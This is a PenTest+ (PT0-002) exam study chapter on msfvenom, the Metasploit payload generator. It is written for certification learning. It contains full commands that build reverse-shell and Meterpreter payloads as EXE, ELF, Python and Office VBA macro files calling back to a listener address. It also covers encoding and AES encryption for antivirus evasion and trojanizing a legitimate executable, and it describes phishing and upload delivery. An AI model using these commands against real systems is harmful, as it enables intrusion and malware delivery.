This chapter covers msfvenom, the Metasploit Framework's payload generation tool, a critical skill for the PT0-002 exam. Msfvenom is used to create custom payloads that can be delivered to a target system to gain initial access or execute code remotely. Approximately 10-15% of exam questions touch on payload generation, encoding, and evasion techniques, making this a high-yield topic. Understanding msfvenom's architecture, command-line options, and output formats is essential for both the multiple-choice and performance-based questions on the exam.
Jump to a section
Imagine you are a special operations team leader planning a covert mission. You need to breach a heavily fortified compound. You cannot use a standard assault rifle because the guards are trained to recognize its sound. Instead, you need custom ammunition—a bullet that looks like a standard round but contains a tiny explosive that activates upon impact. Your armorer, msfvenom, runs a factory that can produce any type of custom round on demand. You specify the target's weapon type (payload), the delivery mechanism (e.g., a standard rifle cartridge or a syringe dart), and any special features like self-destruct timers or encryption. Msfvenom then manufactures the round, ensuring it fits the target's weapon perfectly. You also need to bypass the compound's metal detectors, so you ask the factory to coat the bullet in a non-metallic material (encoding or encryption). Once produced, you load the round into the delivery system and fire. If the bullet is detected and blocked, you can return to the factory, modify the design (e.g., change the coating or payload type), and try again with a new round. The factory also provides a compatibility list—which weapons (payloads) work with which delivery systems (formats like EXE, DLL, or PowerShell). Without this factory, you would have to handcraft each round, a slow and error-prone process. Msfvenom automates and standardizes the creation of custom payloads, allowing you to rapidly iterate and adapt to the target's defenses.
What is msfvenom?
Msfvenom is a command-line tool that replaced msfpayload and msfencode in Metasploit. It allows penetration testers to generate payloads in various formats (e.g., EXE, DLL, PowerShell, Python) with optional encoding and encryption. The primary purpose is to produce a malicious executable or script that, when executed on the target, establishes a reverse shell, binds a shell to a port, or performs other post-exploitation actions. Msfvenom is the go-to tool for creating payloads that evade antivirus and network defenses.
How msfvenom Works Internally
Msfvenom combines a payload (the malicious code) with an output format (the container) and optionally applies encoders or encryption. The process is: 1) Select a payload from the Metasploit payload database (e.g., windows/meterpreter/reverse_tcp). 2) Specify options for that payload, such as LHOST (your IP) and LPORT (your listening port). 3) Choose an output format (e.g., exe, raw, ps1). 4) Optionally select an encoder (e.g., x86/shikata_ga_nai) to obfuscate the payload bytes. 5) Optionally specify encryption (e.g., base64 or AES256). 6) Msfvenom generates the final binary or script by combining the raw payload with the format's wrapper and applying the encoder/encryption.
Key Components, Values, and Defaults
Payloads: Msfvenom supports hundreds of payloads. Common ones for PT0-002: windows/meterpreter/reverse_tcp, linux/x86/shell_reverse_tcp, php/meterpreter_reverse_tcp. Default payload is often windows/meterpreter/reverse_tcp.
Formats: -f flag specifies output format. Examples: exe, raw, python, bash, ps1, vba, hex. Default is raw.
Encoders: -e flag selects an encoder. Common: x86/shikata_ga_nai, x86/jmp_call_additive. Default is no encoding.
Options: -p for payload, LHOST and LPORT are required for reverse payloads. LHOST default is empty (must set). LPORT default is 4444.
Bad Characters: -b flag to specify bytes that cannot appear in the payload (e.g., null bytes \x00). Msfvenom will attempt to encode to avoid them.
Encryption: --encrypt flag with values like base64, aes256, rc4. --encrypt-key sets the key.
Iterations: -i flag sets number of encoding iterations (default 1).
Architecture: -a flag (e.g., x86, x64). Default matches the payload.
Platform: --platform flag (e.g., windows, linux). Default matches the payload.
Configuration and Verification Commands
To list all payloads:
msfvenom -l payloadsTo list all encoders:
msfvenom -l encodersTo list all formats:
msfvenom -l formatsTo generate a simple reverse TCP payload for Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o payload.exeTo generate an encoded payload with 5 iterations:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=5555 -e x86/shikata_ga_nai -i 5 -f exe -o encoded_payload.exeTo generate a Python payload:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.10 LPORT=6666 -f python -o shell.pyTo generate a VBA macro for Office:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=7777 -f vba -o macro.vbaTo avoid bad characters (e.g., null bytes):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=8888 -b '\x00' -f exe -o no_null.exeTo generate an encrypted payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=9999 --encrypt aes256 --encrypt-key 'secret' -f exe -o encrypted.exeHow Msfvenom Interacts with Related Technologies
Msfvenom payloads are typically used with a Metasploit handler (multi/handler) to catch the connection. The handler must match the payload's stager (e.g., reverse_tcp). Msfvenom can also generate stageless payloads (e.g., windows/meterpreter_reverse_tcp with underscore) that contain the full stage, reducing network traffic but increasing size. For AV evasion, msfvenom payloads can be combined with other tools like Veil, Shellter, or custom packers. Msfvenom output can be embedded in exploit code, such as buffer overflow exploits, by using the raw format and then appending the shellcode. The --template flag allows inserting the payload into a legitimate executable (e.g., putty.exe) to create a trojan.
Advanced Features
Custom Exit Functions: EXITFUNC option can be set to process, thread, seh, or none. Default is process for Windows, which exits the whole process—useful for single-use payloads.
NOP Sled: -s flag sets NOP sled length (e.g., -s 16) and -n flag sets NOP generator (default is x86/opty2). Used in exploit development for alignment.
Small Payloads: Use -s to specify maximum size (e.g., -s 100 for space-constrained exploits).
Platform and Architecture Override: Can force a different platform/arch than the payload default, but may break functionality.
Common Pitfalls
Firewall Blocks: Reverse TCP payloads require outbound connectivity from target to attacker. Inbound connections (bind payloads) are often blocked by firewalls. Reverse payloads are preferred.
Payload Size: Large payloads may exceed exploit buffer limits. Use stageless payloads or reduce options.
Encoding Not a Panacea: Encoding can bypass signature-based AV but may still be caught by heuristic or behavioral detection. Multiple iterations and encryption improve evasion.
Mismatched Handler: The handler must use the same payload type (e.g., reverse_tcp) and the same LHOST/LPORT as the generated payload.
Verification of Payload
After generating, you can verify the payload's architecture and format using file command on Linux:
file payload.exeCheck for null bytes using hexdump:
hexdump -C payload.exe | headSummary of Key Commands
| Task | Command |
|------|---------|
| List payloads | msfvenom -l payloads |
| List encoders | msfvenom -l encoders |
| List formats | msfvenom -l formats |
| Generate EXE | msfvenom -p windows/meterpreter/reverse_tcp LHOST=x LPORT=y -f exe -o out.exe |
| Generate with encoding | Add -e x86/shikata_ga_nai -i 5 |
| Avoid bad chars | -b '\x00\x0a\x0d' |
| Encrypt payload | --encrypt aes256 --encrypt-key KEY |
| Use template | -x /path/to/legit.exe |
| Generate raw shellcode | -f raw |
Select Payload and Set Options
First, choose a payload that matches the target OS and your objective. For PT0-002, common payloads are reverse TCP shells or Meterpreter. Use `-p` followed by the payload name. Set required options like LHOST (your IP address) and LPORT (listening port). For example: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444`. The payload defines the stager code that will connect back to your handler. If you omit LHOST, msfvenom will prompt you. The LPORT default is 4444, but you should change it to avoid detection.
Choose Output Format
Specify the file type using `-f`. Common formats include `exe` for Windows executables, `ps1` for PowerShell scripts, `py` for Python, `raw` for shellcode, `vba` for VBA macros, and `bash` for Linux shell scripts. The format determines how the payload is wrapped. For example, `-f exe` produces a PE executable with the payload embedded. For exploit development, `-f raw` outputs the raw bytes of the payload without any wrapper. The `--list formats` command shows all supported formats.
Apply Encoding or Encryption (Optional)
To evade antivirus, you can encode the payload using `-e` and an encoder like `x86/shikata_ga_nai`. Add `-i` for multiple iterations (e.g., `-i 5`). Encoding transforms the payload bytes to avoid signature detection. Encryption can be added with `--encrypt` (e.g., `--encrypt aes256`) and `--encrypt-key`. Note that encoding does not guarantee evasion; it only changes the byte pattern. Some encoders may introduce bad characters, so test with `-b` to specify bytes to avoid. Use `--list encoders` to see available encoders.
Specify Bad Characters and NOP Sled
If the payload will be used in an exploit with character restrictions (e.g., buffer overflow), use `-b` to list hex bytes that cannot appear, such as null bytes (`\x00`), carriage return (`\x0d`), or newline (`\x0a`). Msfvenom will attempt to encode the payload to avoid these bytes. For exploit alignment, use `-s` to prepend a NOP sled of specified length (e.g., `-s 16`). Use `-n` to choose a NOP generator (default is `x86/opty2`). This step is critical for exploit development questions.
Generate and Test the Payload
Run the msfvenom command with `-o` to write the output to a file. For example: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o payload.exe`. After generation, verify the file type with `file payload.exe` and check for bad characters with `hexdump -C payload.exe | grep '00'`. Then set up a Metasploit handler using `use multi/handler`, set the same payload and options, and start listening. Execute the payload on the target to test connectivity. If it fails, adjust options (e.g., change encoder, add encryption, or use a different payload type).
In a typical enterprise penetration test, a consultant is engaged to assess the security of a Windows domain environment. The tester first identifies a vulnerability, such as an unpatched SMB service (EternalBlue) or a weak web application that allows file upload. Using msfvenom, the tester generates a custom payload that will execute on the target Windows server. For example, the tester might create an EXE payload with multiple encoding iterations to bypass endpoint protection. The payload is then delivered via a phishing email attachment or by exploiting the web application's upload functionality. Once executed, the payload calls back to the tester's listener, providing a Meterpreter session. The tester then uses this session to escalate privileges, move laterally, and eventually compromise the domain controller. In a different scenario, a tester might need to generate a payload for a Linux target, such as a web server. Using msfvenom, the tester creates a Python script that executes a reverse shell. The script is uploaded to the server via an SQL injection vulnerability. The tester sets up a netcat listener to catch the shell. Common challenges include payloads being blocked by antivirus or application whitelisting. To overcome this, testers often use msfvenom's encryption feature or combine it with tools like Veil to create entirely new payloads. In cloud environments, testers may generate payloads that communicate over HTTPS to blend in with normal traffic. Msfvenom can generate payloads for various architectures (x86, x64, ARM) and platforms (Windows, Linux, macOS, Android). A common mistake is forgetting to set the correct LHOST (the tester's public IP or VPN IP) leading to no callback. Another is using a bind payload when the target is behind a firewall that blocks inbound connections. Always prefer reverse payloads. Performance-wise, msfvenom is lightweight and can generate payloads in seconds. However, for large-scale phishing campaigns, testers may automate payload generation with scripts. Misconfigurations like using the wrong payload type (e.g., staged vs stageless) can cause the handler to fail. Always verify that the handler's payload exactly matches the generated one.
The PT0-002 exam tests msfvenom primarily under Objective 5.1 (Given a scenario, use tools to conduct a penetration test). You should be able to recall the syntax for generating payloads, common options, and the purpose of each flag. Expect 3-5 questions directly on msfvenom, and several more that require understanding of payload types and evasion techniques.
Common Wrong Answers:
1. Choosing the wrong format: Candidates often select -f raw when they need an executable. The exam may ask for a payload to be delivered via a phishing email; the correct format is exe or vba, not raw.
2. Confusing staged vs stageless: Questions may ask for a payload that is smaller in size. Stageless payloads (e.g., windows/meterpreter_reverse_tcp with underscore) are larger but do not require a second stage. Staged payloads (e.g., windows/meterpreter/reverse_tcp with slash) are smaller initially. The exam expects you to know the naming convention.
3. Misunderstanding encoding: Encoding does not guarantee AV evasion; it only changes the byte pattern. The exam may ask which technique is best for evading signature-based AV. Encoding is a partial answer; encryption or custom packers are more effective.
4. Forgetting LHOST: Reverse payloads require LHOST to be set. The exam may present a command without LHOST and ask why it fails. The answer is that LHOST is missing.
Specific Numbers and Terms:
- Default LPORT for reverse_tcp is 4444.
- Common encoder: x86/shikata_ga_nai.
- Bad characters flag: -b.
- Iterations flag: -i.
- Template flag: -x.
- Exit function option: EXITFUNC (default process).
Edge Cases:
- When generating a payload for a 64-bit target, use the x64 architecture payload (e.g., windows/x64/meterpreter/reverse_tcp). The -a x64 flag can be used but is often redundant.
- For Android payloads, use android/meterpreter/reverse_tcp and format apk.
- For macOS, use osx/x64/shell_reverse_tcp.
How to Eliminate Wrong Answers:
- If the question mentions avoiding null bytes, look for the -b flag in the answer.
- If the question wants to reduce payload size, consider staged payloads or stageless vs staged.
- If the question is about AV evasion, look for encoding, encryption, or template injection.
- Always read the payload name carefully: slashes indicate staged, underscores indicate stageless.
Msfvenom replaces msfpayload and msfencode; use `-p` for payload, `-f` for format, `-e` for encoder, `-i` for iterations.
Default LPORT for reverse TCP payloads is 4444; always set LHOST for reverse payloads.
Common payloads: windows/meterpreter/reverse_tcp, linux/x86/shell_reverse_tcp, php/meterpreter_reverse_tcp.
Use `-b` to specify bad characters (e.g., `-b '\x00\x0a'`).
Encoding (e.g., x86/shikata_ga_nai) obfuscates payload bytes but does not guarantee AV evasion.
Staged payloads (slash) are smaller but require a second stage; stageless (underscore) are larger but self-contained.
The `-x` flag can inject payload into a legitimate executable (template).
Use `--encrypt` and `--encrypt-key` for encryption (e.g., AES256).
Always match the handler's payload and options to the generated payload.
Verify payload with `file` and `hexdump` commands.
These come up on the exam all the time. Here's how to tell them apart.
Staged Payloads (e.g., windows/meterpreter/reverse_tcp)
Small initial stager size (typically < 1KB)
Requires a second stage download from the handler
More network traffic (two connections)
More likely to be detected due to the second stage connection
Naming convention uses forward slash (/)
Stageless Payloads (e.g., windows/meterpreter_reverse_tcp)
Larger initial payload (tens of KB)
Contains the entire stage in one piece
Single connection, less network chatter
Less likely to trigger network-based detection
Naming convention uses underscore (_)
Mistake
Msfvenom can generate payloads that are completely undetectable by antivirus.
Correct
No payload is 100% undetectable. Encoding and encryption can bypass signature-based detection but may still be caught by heuristic or behavioral analysis. AV vendors constantly update signatures. Msfvenom's encoding only obfuscates the byte sequence; it does not change the payload's behavior.
Mistake
You must use an encoder to use msfvenom.
Correct
Encoding is optional. Many payloads work without encoding. Encoding is only needed to avoid bad characters or to evade signature-based detection. The default is no encoding.
Mistake
The default LPORT for all reverse payloads is 4444.
Correct
While 4444 is the default for many reverse TCP payloads, some payloads may have different defaults. Always check with `msfvenom -p [payload] --list-options`. The exam typically tests the common default of 4444.
Mistake
Msfvenom payloads can only be used with Metasploit handlers.
Correct
Msfvenom generates standard shellcode that can be used with other listeners, such as netcat for a reverse shell. However, Meterpreter payloads require a Metasploit handler to process the Meterpreter protocol. Raw shellcode can be used in custom exploits.
Mistake
The `-f raw` format produces an executable file.
Correct
`-f raw` outputs the raw bytes of the payload without any file wrapper. It is not executable on its own. It is used for embedding in exploit code or for further processing. To get an executable, use `-f exe`.
Reveal each answer, then mark whether you got it right. Score 60%+ to unlock the next chapter.
Staged payloads (e.g., windows/meterpreter/reverse_tcp) send a small stager first, which then downloads the larger stage. Stageless payloads (e.g., windows/meterpreter_reverse_tcp) include the entire payload in one piece. Staged payloads are smaller and useful when size is constrained, but they require two connections. Stageless payloads are larger but only need one connection. On the exam, staged payloads use a forward slash in the name, stageless use an underscore.
Use the `-b` flag followed by the hex bytes to avoid, e.g., `-b '\x00'` to avoid null bytes. Msfvenom will attempt to encode the payload so that those bytes do not appear. You can specify multiple bytes, e.g., `-b '\x00\x0a\x0d'`. If encoding fails, msfvenom will report an error.
Yes, msfvenom supports multiple platforms. Use `-p linux/x86/shell_reverse_tcp` for a Linux reverse shell, or `-p linux/x64/shell_reverse_tcp` for 64-bit. Output formats include `elf`, `python`, `bash`, `perl`, etc. For example: `msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f elf -o shell.elf`.
The default EXITFUNC is `process` for Windows payloads. This means the payload will exit the entire process when it finishes. Other options include `thread` (exit only the thread), `seh` (structured exception handler), and `none` (do not exit). The default ensures the process terminates cleanly.
Use `-f vba` to generate a VBA macro. For example: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f vba -o macro.vba`. The output contains VBA code that can be inserted into an Office document. The macro will execute the payload when the document is opened with macros enabled.
The `-x` flag specifies a template executable to inject the payload into. For example, `-x /path/to/putty.exe` will create a new executable that looks like putty.exe but contains the payload. This is used to create trojanized binaries that may evade detection by appearing as legitimate software.
Common reasons: LHOST is not set or set incorrectly (use your public IP or VPN IP), LPORT is blocked by a firewall, the payload format is incorrect for the target OS, or the target cannot reach your listener. Ensure your listener is running and that you are using the exact same payload and options. Also check that the target can make outbound connections to your IP and port.
You've just covered Payload Generation with msfvenom — now see how well it sticks with free PT0-002 practice questions. Full explanations included, no account needed.
Done with this chapter?